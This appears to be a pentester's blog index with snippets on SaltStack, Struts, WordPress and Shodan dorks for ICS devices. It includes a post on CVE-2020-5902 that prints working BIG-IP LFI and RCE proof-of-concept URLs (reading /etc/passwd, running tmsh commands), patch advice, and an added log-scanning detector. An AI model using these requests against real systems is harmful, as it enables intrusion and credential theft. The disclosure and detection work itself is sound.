Hi readers! In this blog, I am talking about SaltStack and its latest remote code execution vulnerability. SaltStack, also known as Salt, is used in DevOps.

What is SaltStack?

SaltStack, also known as Salt, is a configuration management and orchestration tool. It uses a central repository to provision new servers and…


What is VulnMachines?

Hi pentesters, this is Punit Darji. I have created a platform called VulnMachines. This platform is for people who are willing to learn about cyber security and pentesting with real-life scenarios. Therefore, I have decided to deliver real-life scenario-based labs with Basic to Advance…


What is Apache Struts?

Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture.

What is the root cause of the vulnerability?

The root cause was a lack of input validation on the URL passed to the Struts framework.

Let’s begin,


Hi readers! In this post, I would like to share a 2-year-old WordPress DoS attack vulnerability.

What is WordPress?

WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. …


Every Saturday I like to spend time discovering new dorks for Google, Shodan, Fofa and many other search engines. This Saturday I spent my time finding a WordPress dork with Shodan.

WordPress is a website creation tool — an online open source CMS that…


Hi readers! For Saturday with Dork, I posted a dork for the BIG-IP vulnerability on Twitter. Attackers can run commands as an unauthorized user and completely compromise a system, including interception of controller application traffic. The vulnerability can be exploited remotely.

The vulnerability, CVE-2020-5902, received a CVSS score of 10, indicating the highest degree of danger. To exploit it, an attacker needs to send a specially crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Proof of Concept LFI

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Proof of Concept RCE

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Proof of concept CVE-2020-5902

Affected companies are advised to update. Vulnerable versions of BIG-IP (11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated to the fixed versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4).
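To check whether a device has already received requests of the shape shown in the proofs of concept above, the following added example (not part of the original post) scans access-log lines for the `..;/` traversal under `/tmui/`. It goes slightly beyond the two URLs above by percent-decoding the path first, so encoded variants are also flagged. The combined log format, the function names `normalize` and `scan`, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (assumed combined log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120
198.51.100.7 - - [05/Jul/2020:10:02:11 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1873
198.51.100.7 - - [05/Jul/2020:10:02:40 +0000] "GET /tmui/login.jsp/..%3b/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 412
203.0.113.5 - - [05/Jul/2020:10:03:00 +0000] "GET /tmui/login.jsp/%2e%2e;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 404 0
192.0.2.10 - - [05/Jul/2020:10:04:00 +0000] "GET /index.html?q=..;/ HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
TRAVERSAL_RE = re.compile(r'/tmui/.*\.\.;/', re.IGNORECASE)  # "..;/" after a /tmui/ prefix
JSP_RE = re.compile(r'([\w.-]+\.jsp)$', re.IGNORECASE)       # final JSP actually reached

def normalize(path):
    """Percent-decode a bounded number of times so encoded '..;' forms still match."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def scan(log_text):
    """Return one finding per request whose path contains the TMUI '..;/' traversal."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _method, target, status = m.groups()
        path = normalize(target.split("?", 1)[0])  # match on the path, not the query
        if not TRAVERSAL_RE.search(path):
            continue
        jsp = JSP_RE.search(path)
        findings.append({
            "client": client,
            "jsp": jsp.group(1) if jsp else None,
            "status": int(status),
            "served": status.startswith("2"),  # 2xx means the device answered the request
        })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A finding with `served` set to true on an unpatched version means the request was answered and the device should be treated as potentially compromised, not just updated.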

If you like it, then share it with your friends and infosec people :)

Hire me :)

https://in.linkedin.com/in/punit-darji-5500


Hi readers! This is the second blog related to dorks. In this blog, I will show you Moxa universal controller and I/O ICS devices. Moxa ioLogik supports the most often-used protocols for retrieving I/O data, making it capable of handling a wide variety of applications. …


Hello readers! In this series I am going to publish a list of “dorks” related to PLC, SCADA, HMI, routers, and many others. On my Twitter, I have started the series “Saturday with Shodan”. On Saturday, I spend my time with Shodan, ZoomEye, Google and other search engines and find the dorks.


Whenever I do pentesting, I always look at the backend because the developer experience helps me in pentesting. I can understand the developer's problem because they have a fixed timeline to deliver a product or service. But it is the same case in pentesting too :).

I have bypassed OTP using HTTP headers such as…

Rapid SafeGuard

Defensive Security with Black Hat minds
